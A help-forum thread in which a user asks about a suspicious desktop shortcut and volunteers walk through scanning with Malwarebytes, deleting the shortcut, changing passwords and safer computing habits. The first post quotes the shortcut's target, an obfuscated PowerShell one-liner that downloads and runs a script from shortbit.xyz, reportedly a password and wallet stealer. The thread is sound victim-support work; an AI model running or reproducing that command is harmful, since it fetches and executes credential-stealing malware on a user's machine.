Jump to content

Shortcut Trojan


Recommended Posts

I have a shortcut launcher on my desktop I think it is a virus or trojan.

Target properties are as follows:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/psp');s $nq

I saw a previous post indicating it was a trojan. I followed the advice there and did a full scan, how can I tell if the trojan is active.

Link to post
Share on other sites

Hi, 

My name is Maurice.   I will be helping and guiding you, going forward.
We need to get information from this machine in order to have the proper detail to help you forward.
 NOTE: The tools and the information obtained is safe and not harmful to your privacy or your computer, please allow the programs to run if blocked by your system.

    Download Malwarebytes Support Tool
    
    
    Once the file is downloaded, open your Downloads folder/location of the downloaded file
    Double-click mb-support-1.4.0.615.exe to run the report
        You may be prompted by User Account Control (UAC) to allow changes to be made to your computer. Click Yes to consent.
        
    Place a checkmark next to Accept License Agreement and click Next
    You will be presented with a page stating, "Get Started!"

    Do NOT use the button “Start repair” !
    Click the Advanced tab on the left column
    
    Click the Gather Logs button
    
    A progress bar will appear and the program will proceed with getting logs from your computer
   
    Upon completion, click a file named mbst-grab-results.zip will be saved to your Desktop. Click OK
    Please attach the ZIP file in your next reply.

 

Thank you.

 

Link to post
Share on other sites

You are welcome.  Thank you for providing the support tool report.  The Malwarebytes Premium web protection is keeping your pc safe from "shortbit.xyz"

The website block messages are your visual notices of that.

Lets do what follows.

[ 1 ]

Run a scan with Malwarebytes.
Start Malwarebytes from the Start menu.

Click Settings. Then click the Protection tab.
Scroll down and lets be sure the line in SCAN OPTIONs for "Scan for rootkits" is ON
Click it to get it ON

 

On the section "Potential Threat Protection"
look down at the one "Potentially Unwanted Programs (PUPs)" look and make sure it is set to
"Always detect PUPS ".

and

look down at the one "Potential Unwanted Modifications (PUM)" look and make sure it is set to
"Always detect PUM ".

Scroll down to Automatic Quarantine.

on the line "Automatically quarantine detected malware" if it is 'off', Click that to ON


Click the SCAN button.
Select a Threat Scan ( which should be the default).

When the scan phase is done, be real sure you Review and have all detected lines items check-marked on each line on the left. That too is very critical.

Then click on Quarantine selected.

  

Be sure all items tagged were removed. Let it remove what it has detected.

 

[ 2 ]

IF after that, you still see the " shortcut launcher on the desktop"  ....then delete it.

 

Keep me advised.

Cheers.

 

Link to post
Share on other sites

Thanks for the prompt help, much appreciated.

Checked the settings as you requested, it was only the rootkit setting I needed to update.

I had run a scan previously, I'm sure nothing was picked up then, I ran another just now and it again found nothing, hoping that is a good thing.

I also use ESET internet security which I had previously run and that also found nothing.

I deleted the file as advised, hope that is the end of it, but my son must have downloaded something stupidly and I don't know if he tried to run shortcut.

I also saw a post that stated this issue was not specifically detected by MB at present. Can I assume as nothing showed up that this has been dealt with. The previous post I read on the forum relating to this stated that this shortcut downloaded a powershell payload which was designed to steal various passwords, would I need to go in to update those and assume they were compromised, is it safe to do so at present assuming nothing was detected.

 

Is there any other software you would advise I download which might assist me gaining peace of mind.

 

Sorry to bombard you, any advice appreciated, and thanks once again for the prompt advice.

 

Link to post
Share on other sites

There were indications in other posts that it tries to harvest/steal...

  • Bitcoin and Crypto Currency Wallets & information
  • Browser information (history, passwords, etc)    
  • ftp login credentials    
  • Instant Messenger and Email credentials ( accounts and/or passwords )
  • Personal documents
  • Internet Explorer cookies
Link to post
Share on other sites

Hi,

As I understand what you wrote in the last 2 posts:  You have run a scan with Malwarebytes for Windows & it reported no malware.

You have also scanned with ESET internet security & it found nothing.  Those 2 findings are obviously good indicators.

You can if you wish, get an additional opinion at the Microsoft Security scanner.

The Microsoft Safety Scanner is a free stand-alone virus scanner that  can be used to scan for & remove malware or potentially unwanted software from a system.

The download links & the how-to-run-the tool are at this link at Microsoft

https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download

 

.

It is hard to know if that script was ever used in the first place.  Beyond that, it is not known what the script does.

What you should do for is  change all passwords & be sure to use strong passwords.

Change your passwords. Do not use the same password on social media sites. Consider not using single sign-on across sites like with Facebook credentials. ( recall the number of recent & past Facebook site compromises).
That is to say, tighten on on passwords and on browser program security.
Use strong passwords.
See this article on creating strong passwords https://www.howtogeek.com/195430/how-to-create-a-strong-password-and-remember-it/



2 - beef up each web browser ( put a ad block extension). Especially if you use a web-based email service.
Malwarebytes has a browser extension for Chrome & a separate one for Firefox browser.

 

if you use Chrome or Firefox browser, install the Malwarebytes beta browser extension.  There is one for Chrome & another for Firefox.

To get & install the Malwarebytes beta Chrome extension,

Open this link in your Chrome browser: https://chrome.google.com/webstore/detail/malwarebytes/ihcjicgdanjaechkgeegckofjjedodee

Then proceed with the setup.

 

To get & install the Malwarebytes beta Firefox extension.

Open this link in your Firefox browser: https://addons.mozilla.org/en-US/firefox/addon/malwarebytes/

Then proceed with the setup.

.

Your pc has Malwarebytes Premium & ESET Security.    and that combo is very fine.

 

Make sure you backup your system to offline storage media  (like USB backup drives ).  Keep one or 2 back generations.  Backup is your best friend.

 

It is not enough to just have a security program installed. Each pc user needs to practice daily safe computer and internet use.  That applies to all users of this machine.

 

Safer practices & malware prevention:
Follow best practices when browsing the Internet, especially on opening links coming from untrusted sources.
First rule of internet safety: slow down & think before you "click".
Free games & free programs are like "candy". We do not accept them from "strangers".


Never open attachments that come with unexpected ( out of the blue ) email no matter how enticing.
Never open attachments from the email itself. Do not double click in the email. Always Save first and then scan with antivirus program.

Never click links without first hovering your mouse over the link and seeing if it is going to an odd address ( one that does not fit or is odd looking or has typos).

 

Pay close attention when installing 3rd-party programs. It is important that you pay attention to the license agreements and installation screens when installing anything off of the Internet. If an installation screen offers you Custom or Advanced installation options, it is a good idea to select these as they will typically disclose what other 3rd party software will also be installed.
Take great care in every stage of the process and every offer screen, and make sure you know what it is you're agreeing to before you click "Next".

Use a Standard user account rather than an administrator-rights account when "surfing" the web.
See more info on Corrine's SecurityGarden Blog http://securitygarden.blogspot.com/p/blog-page_7.html
Dont remove your current login. Just use the new Standard-user-level one for everyday use while on the internet.


Check in at http://windowsupdate.microsoft.com 
Windows Update and install any Important Updates offered.

Make certain that Automatic Updates is enabled.
https://support.microsoft.com/en-us/help/12373/windows-update-faq




Keep your system and programs up to date. Several programs release security updates on a regular basis to patch vulnerabilities. Keeping your software patched up prevents attackers from being able to exploit them to drop malware.

For other added tips, read "10 easy ways to prevent malware infection"

Link to post
Share on other sites

  • Root Admin

Glad we could help.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread.

Thanks

 

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.